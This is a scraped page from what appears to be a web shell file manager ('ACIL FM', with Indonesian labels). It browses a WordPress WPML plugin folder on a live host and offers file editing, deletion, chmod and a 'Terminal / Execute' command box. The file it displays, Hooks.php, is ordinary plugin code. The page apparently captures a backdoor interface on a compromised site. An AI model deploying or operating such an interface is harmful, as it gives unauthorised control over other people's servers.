ACIL FM
Dark
Refresh
Current DIR:
/home/mhhtmff/www/site/wp-content/plugins/sitepress-multilingual-cms/classes/support/ATE
/
home
mhhtmff
www
site
wp-content
plugins
sitepress-multilingual-cms
classes
support
ATE
Upload
Zip Selected
Delete Selected
Pilih semua
Nama
Ukuran
Permission
Aksi
Hooks.php
480 B
chmod
View
DL
Edit
Rename
Delete
View.php
1.36 MB
chmod
View
DL
Edit
Rename
Delete
ViewFactory.php
316 B
chmod
View
DL
Edit
Rename
Delete
Edit file: /home/mhhtmff/www/site/wp-content/plugins/sitepress-multilingual-cms/classes/support/ATE/Hooks.php
<?php namespace WPML\Support\ATE; class Hooks implements \IWPML_Backend_Action, \IWPML_DIC_Action { /** @var ViewFactory $viewFactory */ private $viewFactory; public function __construct( ViewFactory $viewFactory ) { $this->viewFactory = $viewFactory; } public function add_hooks() { add_action( 'wpml_support_page_after', [ $this, 'renderSupportSection' ] ); } public function renderSupportSection() { $this->viewFactory->create()->renderSupportSection(); } }
Simpan
Batal
Isi Zip:
Unzip
Create
Buat Folder
Buat File
Terminal / Execute
Run
Chmod Bulk
All File
All Folder
All File dan Folder
Apply